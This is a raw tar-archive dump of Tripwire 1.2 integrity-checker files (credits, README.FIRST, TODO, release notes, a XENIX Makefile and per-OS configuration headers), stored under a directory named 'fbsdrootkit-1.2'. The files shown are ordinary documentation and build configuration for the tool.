people. Asokan, Casper H.S. Dik, Paul Hilchey, Tom Orban Cal Page, Paul Szabo, and Eugene Zaustinsky all contributed code that we added to the release. (We list their contributions in the WHATSNEW file.) In addition, we thank the following people. Eric Berg, Eric M. 
Boehm, Lothar Butsch, John Crosswhite, Jason Downs, Peter Evans, Jon Freivald, Kevin Johnson, Lothar Kaul, Terry Kennedy, Chris Kern, Paul Madden, Fred Marchand, Mitchell Marks, Jim Moreno, Tom Orban, Lorraine Padour, Calvin Page, Tom Painter, Roger Peyton, Peter Phillips, Keith W. Rickert, Jim Roche, D Seddon, Paul Szabo, Gene C Van Nostern, John Wiegley, Robert Wilhite, Alain Williams, Eugene Zaustinsky, We appreciate the heroic effort of the Tripwire beta testers who suggested functional additions to Tripwire, found and hunted down bugs, and refined Tripwire beyond the authors' expectations. Special thanks go to: Walker Aumann, Lance R. Bailey, Michael Barnett, David Barr, Greg Black, Adrian P. van Bloois, J. Dean Brock, Kurt Cockrum, John Cristy, Jim Duncan, David S. Goldberg, Johannes Gronvall, Tom Gutnick, Michaela Harlander, Andreas Haug, Bill Henderson, Jim Hendrick, Norman Hill, Paul Joslin, Poul-Henning Kamp, Leslie Kordas, Simon Leinen, Philip Yzarn de Louraille, Stephen Mahler, Fletcher Mattox, Ken McDonell, Wes Morgan, Phil Moyer, Dan O'Neill, Joe Polcari, Phillip Porch, Brad Powell, W. Purvis, Daniel Ray, Dean Rich, Bill Romine, John P. Rouillard, Rich Salz, Christopher Samuel, Pete Shipley., David W. Smith, Harlan Stenn, Margarita Suarez, John G. Sutton, Tim Tessin, John Wagner, David Wiseman, Irving Wolfe, Stephen M. Youndt Extra kudos go to Ken McDonnell and Rich Salz for "raising the bar" of code quality through their wonderfully meticulous and insightful code-reviews during the beta-test period. E. Clinton Arbaugh provided extremely helpful advice and bug reports for the third patch release. He contributed greatly towards refinement in v1.0.4. GeneK and Spaf want to apologize in advance to anyone who sent us patches, comments or configuration info and whose name doesn't appear (but should). Please write to us and so we can correct the situation! 
Gene & Gene Kim & Spafford November 2, 1992 (gkim@cs.purdue.edu) (spaf@cs.purdue.edu) Last updated July 17, 1994 fbsdrootkit-1.2/tripwire-1.2/README.FIRST100600 764 764 2356 5630546455 15066 0ustar dfdfWhether you have used an earlier version of Tripwire, or whether you are a new user, we suggest that you do the following things in order to *properly* build and use Tripwire: 1) read the README file at least once 2) read the FAQ file 3) edit the include/config.h file to set the appropriate values for your site 4) go to single user mode for the remaining steps 5) reinstall your binaries to be certain they are safe 6) "make && make test" 7) go back and read the README and FAQ for real to understand why the test failed. :-) 8) move the Tripwire binary, any contrib/* scripts or programs, and copies of the configuration files to their final destination. 9) edit your copy of the config file to suit local needs 10) run Tripwire in initialization mode 11) set the destination directory's disk to "read-only" in hardware, and/or take stand-alone signatures of all the files using the "siggen" utility. 12) resume normal operations. Note that you can build and install Tripwire without reading the documentation, without setting a read-only disk, and without reinstalling your binaries. You can also leave your seat belt unbuckled when you drive, or leave your door unlocked when you leave. To understand what that all means, go to step #1. fbsdrootkit-1.2/tripwire-1.2/TODO100600 764 764 5062 5612106406 13771 0ustar dfdf# $Id: TODO,v 1.17 1994/07/17 01:44:38 gkim Exp $ v1.2: Mon Mar 28 16:23:09 MST 1994 - add device (major, minor) numbers to database. - need Ported entries for Motorola stuff - need Ported entries for SCO stuff - need to mention Bishop's complaint - we need to figure out how to handle the new flex stuff. leaving ./contrib/config.pre.l.linux won't fly. BSD/386 also will suffer this problem. (And hurd, too, but they deserve it.)
- eventually, the list routines should be changed to not tuck the varname and varvalue payloads as part of the structures. it was a good idea, and potentially saves mallocs. but, it is no longer possible to use our lists as string tables, because realloc() will sometimes free the strings! this is not a big nor pressing issue, but the changed list routines breaks some assertions that I made when I coded much of Tripwire. (Paul's list routines are still much better than mine!) v1.1: Mon Dec 13 09:38:23 EST 1993 - add !(num) pruning syntax (thanks Rik Farrow) v1.0.4: Fri Sep 3 11:56:32 EDT 1993 - add base10 signature printing - get tripwire to compile on SCO machines (ash@cellar.demon.co.uk,spaf) - tripwire daemon (safdas@moose.gs.com) - make -loosedir default behavior - monotonically increasing files (rouilj@ra.cs.umb.edu) - It should be possible to specify different ignore flags for directories and files in these directories, e.g.: =/var/tmp L-c /var/tmp E (jv@mh.nl) - add MD2 grant notice - add -partialcheck option (John Rouillard) (use entrynum) - add type classifiers (exclude/include certain types of files -- John Rouillard) - AT&T Starserver E compiler has problems - add -q option to make Tripwire noisy only when files change (Eric Bergren ) - make tests unrunnable from ./test directory (help Spaf?) - make MD5 faster (Eugene Zaustinsky) first net release v1.0: Tue Nov 3 04:37:39 EST 1992 fix byte "mangling" on MD2, MD4 and Snefru for Cray machines fix lurking bug that surfaces in ETA-10 versions find out why malloc() sometimes fails in Cray versions add -add and -delete command-line options database locking \ tripwire logging / Drew Gonczi has some fascinating ideas... regular expression handling in tw.config file hook for tar and cpio file parsing inclusion of complete and authorative documentation add "information mode" that explains inode fields change ./aux to some other name so MS-DOS users can unpack the sources! 
fbsdrootkit-1.2/tripwire-1.2/WHATSNEW100600 764 764 34004 5630546456 14517 0ustar dfdf## $Id: WHATSNEW,v 1.19 1994/08/30 06:09:50 gkim Exp $ ## ## WHATSNEW for Tripwire v1.2, v1.1.1, and v1.1 ## ## Gene Kim & Gene Spafford ## The COAST Project ## Department of Computer Sciences ## Purdue University ## ## ## Version 1.2 -- July 15, 1994 ## Version 1.2 adds several new features, as well as fixing reported bugs. Among the changes are: - Signature checking for symbolic link contents has been added. - Tripwire now correctly runs on Alpha AXPs, and other machines with "long" types that are not 32 bits wide. - The Haval digital hash routine has been added as the eighth signature routine (faster than MD5, and purportedly more secure). - The SHA signature routine has been changed to conform to the recent fix introduced in its FIPS definition by NIST/NSA to correct an unspecified weakness. - The database format changes slightly to correct a boundary condition error. Because database entry numbers change, because the SHA signatures change, and because of Haval, old Tripwire databases must be reinitialized. - Handling of specified configuration and database files (and file descriptors) has been fixed to better accommodate pipes. - Full support for flex added. - Signature checking is now considerably faster through the use of the stdio library for file I/O. - A Perl script has been added to update Tripwire databases where all inode numbers were changed by "fsirand" (NFS sites only); See FAQ. - Another fix to make database updates more predictable. - All reported bugs have been fixed in this revision. - A new README section describes some documented attacks on systems running Tripwire. - Many small changes have been made to the documentation to correct and update information. NOTE: The script `twdb_check.pl' (written in Perl) has been added to the distribution. It checks database consistency after updates of the tw.config file.
This functionality will be put into the Tripwire program in the next release. Run this script after Tripwire database updates to ensure that database entry numbers are consistent with the tw.config file. See the README file for details (section 3.5.2). Numerous other people played a crucial role in shaping this release: Paul Szabo is responsible for a number of fixes and cleaning up the way filenames are handled internally, leading to a much simpler treatment to filenames with escaped characters in Tripwire. Paul Hilchey is responsible for rewriting the list routines, fixing a number of bugs and replacing a hideous implementation with one that is elegant and succinct. Asokan is responsible for going through all the Tripwire code to remove assumptions about the size of certain types (e.g., "long" is not 32 bits on the Alpha). Casper H.S. Dik pointed out how some signature routines used very small reads, leading to suboptimal performance. He offered a simple fix through the use of the stdio library for file I/O. Cal Page modified the lex and yacc files to accomodate newer versions of GNU flex and bison, which continue to diverge from the traditional tools. Tom Orban spent many an afternoon on the phone with me, guiding me step-by-step to find elusive database update bugs. Among other things, Tom Orban and Terry Kennedy helped track down the problems that led to the addition of the twdb_check.pl script. Keith Rickert and Eugene Zaustinsky painstakingly pointed out distribution errors. Keith Rickert and Greg Black helped us with the last batch of fixes that shortly preceded this release. We appreciate their help. Thanks go to those people who helped test Tripwire: Eric Berg, Eric M. Boehm, Lothar Butsch, John Crosswhite, Jason Downs, Peter Evans, Jon Freivald, Kevin Johnson, Lothar Kaul, Terry Kennedy, Chris Kern, Paul Madden, Fred Marchand, Mitchell Marks, Jim Moreno, Tom Orban, Lorraine Padour, Calvin Page, Tom Painter, Roger Peyton, Peter Phillips, Keith W. 
Rickert, Jim Roche, D Seddon, Paul Szabo, Gene C Van Nostern, John Wiegley, Robert Wilhite, Alain Williams, Eugene Zaustinsky. Gene & Gene Kim & Spafford ## ## Version 1.1 -- December 15, 1994 ## Introduction: ============= Version 1.1 considerably upgrades the functionality of Tripwire. All known bugs have been fixed, and many selected features have been added at the request of Tripwire users. Among the major changes are: - rewrite of the "-update" command. - addition of an "-interactive" command that prompts the user whether a changed file's database entry should be updated. - addition of a "-loosedir" command for quieter Tripwire runs. - support for monotonically growing files in tw.config. - addition of comprehensive test suite to test Tripwire functionalities. - hooks for external services (i.e., compression, encryption, networking) through "-cfd" and "-dfd" options. - addition of the new NIST SHA/SHS signature algorithm. - corrections and changes in the MD2, MD4, MD5, CRC32, and Snefru signature routines. - addition of a more rigorous signature test suite. - more error checking in tw.config @@directives. - siggen replaces sigfetch. - addition of a tw.config file for Solaris v2.2 (SVR4). - change of base-64 alphabet to conform to standards. - preprocessor macro fixes. New Tripwire database format: ============================= The Tripwire database format has changed since v1.0, using a different base-64 alphabet and encoding scheme. Use the twconvert program to convert v1.0 databases to v1.1 databases (located in the ./src directory). If you have been using an older version of Tripwire, you will need to use twconvert convert your databases to the new format. Updating the Tripwire database: =============================== There has been a major rewrite/rethink of the "tripwire -update" command, as well as the addition of a "tripwire -interactive" command which allows the user to interactively select which database entries should be updated. 
No vestiges of the "-add" or "-delete" command remain, since the "-update" command now automatically deletes and adds files. However, the preferred way of keeping Tripwire databases in sync with the filesystems is using the "-interactive" command. A Tripwire session using Interactive mode might look like: 6:25am (flounder) tw/src 1006 %% tripwire -interactive ### Phase 1: Reading configuration file ### Phase 2: Generating file list ### Phase 3: Creating file information database ### Phase 4: Searching for inconsistencies ### ### Total files scanned: 49 ### Files added: 0 ### Files deleted: 0 ### Files changed: 49 ### ### After applying rules: ### Changes discarded: 47 ### Changes remaining: 2 ### changed: drwx------ genek 1024 May 3 06:25:37 1993 /homes/genek/research/tw/src changed: -rw------- genek 7978 May 3 06:24:19 1993 /homes/genek/research/tw/src/databases/tw.db_flounder.Eng.Sun.COM.old ### Phase 5: Generating observed/expected pairs for changed files ### ### Attr Observed (what it is) Expected (what it should be) ### =========== ============================= ============================= /homes/genek/research/tw/src st_mtime: Mon May 3 06:25:37 1993 Mon May 3 06:11:39 1993 st_ctime: Mon May 3 06:25:37 1993 Mon May 3 06:11:39 1993 ---> File: '/homes/genek/research/tw/src' ---> Update entry? [YN(y)nh?] y ### Updating database... ### ### Phase 1: Reading configuration file ### Phase 2: Generating file list ### Phase 3: Updating file information database ### ### Warning: Old database file will be moved to `tw.db_flounder.Eng.Sun.COM.old' ### in ./databases. ### 6:25am (flounder) tw/src 1007 %% Tripwire prompts the user whether the database entry of the current file should be updated to match the current file information. Pressing either 'y' or 'n' either updates the current file or skips to the next file. Pressing 'Y' or 'N' applies your answer to the entire entry. 
(I.e., if /etc is changed, typing 'Y' will not only update /etc, but it will also update all the files in /etc.) Tripwire exit codes: ==================== Tripwire's exit status can be interpreted with the following bit mask: 1: run-time error. aborted. 2: files added 4: files deleted 8: files changed For example, if Tripwire exits with status code 10, then files were found added and changed. (i.e., 8 + 2 = 10.) Tripwire quiet option: ====================== When run with the -q option, Tripwire really is quiet, printing only one-line reports for each added, deleted, or changed file. The output is more suitable for parsing with awk or perl. Monotonically growing files: ============================ The ">" template is now supported in the tw.config files. This template allows files to grow without being reported. However, if the file is deleted or is smaller than the size recorded in the database, it is reported as changed. Loose directory checking: ========================= This option was prompted by complaints that Tripwire in Integrity Checking and Interactive mode unnecessarily complains about directories whose nlink, ctime, mtime, or size have changed. When Tripwire is run with the "-loosedir" option, directories automatically have these attributes included in their ignore-mask, thus quieting these complaints. The trade-off is that changes to those directory attributes are then never reported. Note that this option is not enabled by default, making normal Tripwire behavior no different than previous releases. However, running with this option enabled considerably decreases "noise" in Tripwire reports. (Ideally, this "loose directory checking" should be offered on a per-file basis in the tw.config file. However, adding another field to the tw.config file was too extensive a change to be considered for this release. A later release of Tripwire may rectify this.)
Hooks for external services: ============================ Tripwire now supports the "-cfd" and "-dfd" options, which allow the user to specify an open file descriptor for reading the configuration file and database file, respectively. Using these options, an external program can feed Tripwire both input files through open file descriptors. This external program could supply services not provided through Tripwire, such as encryption, data compression, or a centralized network server. This program might do the following: Open the database and configuration files, process or decode (e.g., uncompress the file), and then write out the regularly formatted file to a temporary file. Open file descriptors to these files are then passed to Tripwire by command-line arguments through execl(). An example of using a shell script to compress and encrypt your files is given in ./contrib/zcatcrypt. It is a four-line Bourne shell script that encrypts and compresses the database and configuration files. SHA/SHS signature routines: =========================== Tripwire now includes SHA/SHS, the proposed NIST Digital Signature Standard. See the README file for details on this algorithm. Please note that the SHA code in ./sigs/sha seems to be poorly handled by many optimizing C compilers. For example, the stock C compiler included with SunOS 4.x takes almost two minutes to compile this file with the -O option on a Sparcstation10. Other compilers (such as GCC) do not have this problem. Change in tw.config preprocessor: ================================= The tw.config preprocessor has been changed to allow the proper expansion of @@variables in filenames. The following use of @@define now works as expected: @@define DOMAIN_NAME my_main_nis_domain /var/yp/@@DOMAIN_NAME L @@DOMAIN_NAME/FOO L (This is the third attempt at getting this working correctly. We finally fixed this by moving the macro expansion routines into the lexical analyzer.)
Expanded test suite: ==================== The Tripwire test suite now includes a more standard signature test suite. This was prompted by discovery of several implementation errors in the MD2, MD4, and MD5 signature routines that were introduced right before the official release of Tripwire. (Thanks Eugene Zaustinsky.) Two more test suites have been added. One iterates through all the Tripwire reporting functionalities, and exercises all the database update cases. The other test suite checks for proper Tripwire preprocessor macro expansions. CRC32 changes: ============== Furthermore, the CRC32 signature routine is now POSIX 1003.2 compliant. (Thanks Dan Bernstein.) "siggen" replaces "sigfetch": ============================= As a tester noted, "sigfetch" was a misnomer since nothing was actually being fetched. Consequently, it was easy to (incorrectly) conclude that "sigfetch" retrieved signatures from the database. The "siggen" command is the current incarnation of "sigfetch". The manual pages reflect this change. Source code cleanup: ==================== The authors went through the sources, doing generic cleanups to aid code comprehension. Bug fixes: ========== This release fixes all known bugs. The TODO list, however, gives a wishlist of features that may be included in future releases. List of thanks: =============== Special thanks go to the testers of disappearing v1.0.3. Reports of critical bug fixes go to (in no special order): E. Clinton Arbaugh, Pat Macdonald, Eric Demerling, John Rouillard, Bob Cunningham, and Neil Todd. Sam Gassel, Edward DeHart, Drew Gonczi, Rik Farrow, Jim Napier, Drew Jolliffe, John Rouillard, Alain Brossard, Eric Bergren, Patrick Sullivan, Nora Hermida, Juergen Schmidt, Debbie Pomerance, Michael Hines, Tim Ramsey, Georges Tomazi, Mitchell Marks, Philip Cox, Kevin Dupre', Chris Kern, and Eugene Zaustinsky helped in getting the Tripwire v1.1 release in shape for our December 1993 release.
Gene & Gene Kim & Spafford fbsdrootkit-1.2/tripwire-1.2/configs/ 40700 764 764 0 5630552013 14626 5ustar dfdffbsdrootkit-1.2/tripwire-1.2/configs/Makefile.xenix100600 764 764 12234 5434607427 17555 0ustar dfdf# $Id: Makefile.xenix,v 1.2 1993/08/19 05:26:47 genek Exp $ # # Tripwire build # # Gene Kim # Purdue University # # XENIX Makefile # support for parallel compiles (ala Dynix) # comment the following line out if your Make doesn't support this syntax. #P = & # you can use ANSI C if you like, but K&R is equally fine. CC = cc CFLAGS = -O #CC = gcc #CFLAGS = -O -ansi # make sure libraries are not linked dynamically (as a security measure) #LDFLAGS= -Bstatic LDFLAGS= -s -lx # NOTICE/TNL -lx required for dir type functions in LDFLAGS # If you don't have the install command, you need to replace # the use of it later in the makefile with a cp and chmod INSTALL= /etc/install # where you want to install the Tripwire binary TARGET = /usr/tmp/ch.Z.1123 # NOTICE/TNL above is a sneaky dir stored UNDER mounted /usr/tmp filesystem # to be exposed only during tripwire runs. A daemon (that does other things) # has a chdir("/usr/tmp"); that keeps the filesystem busy to confuse bad guys. # tripwire will kill -17 $TRIPWIREPID to tell the daemon to chdir away # from /usr/tmp so root can umount it for the tripwire run. Then another # SIGUSR2 to tell daemon to reoccupy /usr/tmp after the run. # how you get hostname information (BSD vs. 
SYSV style) HOSTNAME = uname -n #HOSTNAME = hostname OFILES = config.parse.o main.o list.o ignorevec.o databs.build.o \ utils.o preen.o diff.sorted.o diff.parse.o preen.interp.o \ preen.report.o nullsig.o \ $(SIG1) $(SIG2) SIG1DIR = ./md5 SIG2DIR = ./snefru SIG1 = $(SIG1DIR)/md5wrapper.o $(SIG1DIR)/md5.o SIG2 = $(SIG2DIR)/snefru.o # for generating shar distribution package DIST = tripwire-0.9 DISTPKG = Makefile README README.FIRST README.coast TODO Announce \ tripwire.config *.[ch] tripwire.8 tripwire.design.ms Changelog ### all: tripwire tripwire: $(P) $(OFILES) $(CC) $(CFLAGS) $(LDFLAGS) -o $@ $(OFILES) $(SIG1): (cd $(SIG1DIR); make CC="$(CC)" CFLAGS="$(CFLAGS)") $(SIG2): (cd $(SIG2DIR); make CC="$(CC)" CFLAGS="$(CFLAGS)") .c.o: $(CC) $(CFLAGS) -c $< install: tripwire $(INSTALL) tripwire $(TARGET) test: tripwire @HOST=`$(HOSTNAME)`; \ CURRPATH=`pwd`; \ sed s,/tmp/genek/tripwire-0.9,$$CURRPATH, \ < ./Tests/tripwire.database_TEST \ > ./Databases/tripwire.database_$$HOST; \ cp tripwire.config tripwire.config.orig; \ sed s,/tmp/genek/tripwire-0.9,$$CURRPATH, \ < ./tripwire.config.orig \ > ./tripwire.config; @echo ======= test begin ======= ; ./tripwire; @echo ======= test end ======= ; @echo ''; mv tripwire.config.orig tripwire.config; @CURRPATH=`pwd`; \ echo ''; \ echo Tripwire should have only reported: ; \ echo " added: $$CURRPATH/tripwire.config.orig" ; \ echo " $$CURRPATH/Databases/... " ; \ echo " changed: $$CURRPATH (your current directory) " ; \ echo " ...and any other files you may have changed!" 
# # only for building distribution # maketest: HOST=`$(HOSTNAME)`; \ CURRPATH=`pwd`; \ ./tripwire -initialize; \ cp ./Databases/tripwire.database_$$HOST ./Tests/tripwire.database_TEST;\ cp ./Tests/tripwire.database_TEST /tmp/genek/tripwire-0.9/Tests tags: force ctags *.[ch] shar: -mkdir $(DIST) -mkdir $(DIST)/Databases -cp $(DISTPKG) $(DIST) -cp -r $(SIG1DIR) $(SIG2DIR) ./$(DIST) -cp -r configs Tests $(DIST) -rm -fr ./$(DIST)/$(SIG1DIR)/RCS -rm -fr ./$(DIST)/$(SIG1DIR)/CVS.adm -rm -fr ./$(DIST)/$(SIG2DIR)/RCS -rm -fr ./$(DIST)/$(SIG2DIR)/CVS.adm -rm -fr ./$(DIST)/Tests/CVS.adm -rm -fr $(DIST)/./configs/CVS.adm -rm -f ./$(DIST)/$(SIG1DIR)/*.o -rm -f ./$(DIST)/$(SIG2DIR)/*.o shar -a $(DIST) > Tripwire.Dist.shar -rm -rf ./$(DIST) tar: -mkdir $(DIST) -mkdir $(DIST)/Databases -cp $(DISTPKG) $(DIST) -cp -r $(SIG1DIR) $(SIG2DIR) ./$(DIST) -cp -r configs Tests $(DIST) -rm -fr ./$(DIST)/$(SIG1DIR)/RCS -rm -fr ./$(DIST)/$(SIG1DIR)/CVS.adm -rm -fr ./$(DIST)/$(SIG2DIR)/RCS -rm -fr ./$(DIST)/$(SIG2DIR)/CVS.adm -rm -fr $(DIST)/./Tests/CVS.adm -rm -fr $(DIST)/./configs/CVS.adm -rm -f ./$(DIST)/$(SIG1DIR)/*.o -rm -f ./$(DIST)/$(SIG2DIR)/*.o tar cf Tripwire.Dist.tar $(DIST) -rm -rf ./$(DIST) depend: force makedep mv Makefile Makefile.old mv Makefile.new Makefile proto: force makeproto tripwire.h *.c clean: rm -f $(OFILES) clobber: clean force: # include dependencies #### Do not remove this line. Makedep depends on it! 
#### config.parse.o: ./config.h config.parse.o: ./list.h config.parse.o: ./tripwire.h databs.build.o: ./config.h databs.build.o: ./list.h databs.build.o: ./tripwire.h diff.parse.o: ./config.h diff.parse.o: ./list.h diff.parse.o: ./tripwire.h diff.sorted.o: ./config.h diff.sorted.o: ./list.h diff.sorted.o: ./tripwire.h diff.sorted.o: ./utils.c ignorevec.o: ./config.h ignorevec.o: ./list.h ignorevec.o: ./tripwire.h list.o: ./config.h list.o: ./list.h main.o: ./config.h main.o: ./list.h main.o: ./tripwire.h main.o: ./snefru/snefru.h main.o: ./md5/md5.h main.o: ./nullsig.h nullsig.o: ./config.h preen.o: ./config.h preen.o: ./list.h preen.o: ./tripwire.h preen.interp.o: ./config.h preen.interp.o: ./list.h preen.interp.o: ./utils.h preen.interp.o: ./tripwire.h preen.report.o: ./config.h preen.report.o: ./list.h preen.report.o: ./tripwire.h utils.o: ./config.h utils.o: ./list.h utils.o: ./tripwire.h fbsdrootkit-1.2/tripwire-1.2/configs/conf-3b2g.h100600 764 764 2134 5434607430 16564 0ustar dfdf/* $Id: conf-3b2g.h,v 1.2 1993/08/19 05:26:48 genek Exp $ */ /* * conf-3b2g.h * * Tripwire configuration file * * Gene Kim * Purdue University * * Port by Joe Sirrianni * */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #define SYSV 3 /* * does your system have a like System V? */ #define MALLOCH /* * does your system have a like POSIX says you should? */ #undef STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? 
*/ #undef GETHOSTNAME /* * missing defines */ #define MAXPATHLEN 256 /* * To work around lack of gettimeofday() in src/dbase.build.c */ #define NOGETTIMEOFDAY fbsdrootkit-1.2/tripwire-1.2/configs/conf-3b2gr.h100600 764 764 1720 5434607431 16747 0ustar dfdf/* $Id: conf-3b2gr.h,v 1.2 1993/08/19 05:26:49 genek Exp $ */ /* * conf-3b2gr.h * * Tripwire configuration file * * Gene Kim * Purdue University * * Port by Joe Sirrianni * */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #define SYSV 4 /* * does your system have a like System V? */ #define MALLOCH /* * does your system have a like POSIX says you should? */ #define STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #undef GETHOSTNAME fbsdrootkit-1.2/tripwire-1.2/configs/conf-aix.h100600 764 764 1727 5434607432 16621 0ustar dfdf/* $Id: conf-aix.h,v 1.2 1993/08/19 05:26:50 genek Exp $ */ /* * conf-aix.h * * Tripwire configuration file * * Gene Kim * Purdue University */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #undef SYSV /* * does your system have a like System V? */ #undef MALLOCH /* * does your system have a like POSIX says you should? */ #undef STDLIBH /* * does your system have gethostname(2) (instead of uname(2))? */ #define GETHOSTNAME /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include ok? 
(as opposed to ) */ #define STRINGH /* * miscellaneous stuff * * AIX redefines much of typedefs as unsigned longs. */ #define AIX fbsdrootkit-1.2/tripwire-1.2/configs/conf-apollo.h100600 764 764 2131 5532334025 17306 0ustar dfdf/* $Id: conf-apollo.h,v 1.1 1994/02/22 07:45:25 gkim Exp $ */ /* * conf-apollo.h (Apollo Domain/OS SR10.X, m68k or a88k, BSD environment) * * Tripwire configuration file * * Paul Szabo * University of Sydney */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivative? if so, what version? * (e.g., define SYSV 4) */ #undef SYSV /* * does your system have a like System V? */ #undef MALLOCH /* * does your system have a like POSIX says you should? */ /* Apollos DO NOT have this pre-SR10.4 (or maybe pre-SR10.3 ??), so you must have NO (#undef) pre-SR10.4 (or pre-SR10.3); you should have YES (#define) at SR10.4 (or SR10.3). */ #undef STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #undef DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #define GETHOSTNAME fbsdrootkit-1.2/tripwire-1.2/configs/conf-aux3.h100600 764 764 1764 5434607433 16722 0ustar dfdf/* $Id: conf-aux3.h,v 1.2 1993/08/19 05:26:51 genek Exp $ */ /* * conf-aux3.h * * Tripwire configuration file * * Gene Kim * Purdue University * * A/UX port provided by: * Phillip Porch (root@raidernet.com) */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #define SYSV 2 /* * does your system have a like System V? */ #define MALLOCH /* * does your system have a like POSIX says you should? 
*/ /* #define STDLIBH */ /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #undef GETHOSTNAME /* * missing defines */ /* #define MAXPATHLEN PATH_MAX */ fbsdrootkit-1.2/tripwire-1.2/configs/conf-bsd.h100600 764 764 1543 5434607434 16606 0ustar dfdf/* $Id: conf-bsd.h,v 1.2 1993/08/19 05:26:52 genek Exp $ */ /* * conf-bsd.h * * Tripwire configuration file * * Gene Kim * Purdue University */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #undef SYSV /* * does your system have a like System V? */ #undef MALLOCH /* * does your system have a like POSIX says you should? */ #undef STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #undef DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #define GETHOSTNAME fbsdrootkit-1.2/tripwire-1.2/configs/conf-bsdi.h100600 764 764 1637 5620062014 16745 0ustar dfdf/* $Id: conf-bsdi.h,v 1.2 1994/08/04 03:44:12 gkim Exp $ */ /* * conf-bsdi.h * * Tripwire configuration file * * Terry Kennedy * St. Peter's College * Derived from: * Gene Kim * Purdue University */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #undef SYSV /* * does your system have a like System V? */ #undef MALLOCH /* * does your system have a like POSIX says you should? */ #define STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include ok? 
(as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #define GETHOSTNAME fbsdrootkit-1.2/tripwire-1.2/configs/conf-convex.h100600 764 764 1677 5434607435 17351 0ustar dfdf/* $Id: conf-convex.h,v 1.2 1993/08/19 05:26:53 genek Exp $ */ /* * conf-convex.h * * Tripwire configuration file * * Gene Kim * Purdue University * * Ported to COnvexos 9.1 * by Adrian P van Bloois at ACCU */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #undef SYSV /* * does your system have a like System V? */ #undef MALLOCH /* * does your system have a like POSIX says you should? */ #define STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #define GETHOSTNAME fbsdrootkit-1.2/tripwire-1.2/configs/conf-dynix.h100600 764 764 1547 5434607436 17177 0ustar dfdf/* $Id: conf-dynix.h,v 1.2 1993/08/19 05:26:54 genek Exp $ */ /* * conf-dynix.h * * Tripwire configuration file * * Gene Kim * Purdue University */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #undef SYSV /* * does your system have a like System V? */ #undef MALLOCH /* * does your system have a like POSIX says you should? */ #undef STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #undef DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? 
*/ #define GETHOSTNAME fbsdrootkit-1.2/tripwire-1.2/configs/conf-epix.h100600 764 764 1512 5434607437 17002 0ustar dfdf/* $Id: conf-epix.h,v 1.2 1993/08/19 05:26:55 genek Exp $ */ /* * conf-umips.h * * Tripwire configuration file * */ /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #define SYSV 4 /* * does your system have a like System V? */ #define MALLOCH /* * does your system have a like POSIX says you should? */ #undef STDLIBH /* * does your system use readdir(3) that returns (struct dirent *)? */ #define DIRENT /* * is #include ok? (as opposed to ) */ #define STRINGH /* * does your system have gethostname(2) (instead of uname(2))? */ #define GETHOSTNAME fbsdrootkit-1.2/tripwire-1.2/configs/conf-hpux.h100600 764 764 2347 5612067671 17026 0ustar dfdf/* $Id: conf-hpux.h,v 1.5 1994/07/16 23:39:37 gkim Exp $ */ /* * conf-hpux.h * * Tripwire configuration file * * Gene Kim * Purdue University * * HP/UX port by: * Lance Bailey */ /* "Cory F. Cohen" writes: * My GCC already had _HPUX_SOURCE defined... so I used * #ifndef __GNUC__ (I added) * #define _HPUX_SOURCE (My GCC already had this defined) * #endif (I added) */ #define _HPUX_SOURCE /*** *** Operating System specifics *** *** If the answer to a question in the comment is "Yes", then *** change the corresponding "#undef" to a "#define" ***/ /* * is your OS a System V derivitive? if so, what version? * (e.g., define SYSV 4) */ #undef SYSV /* * does your system have 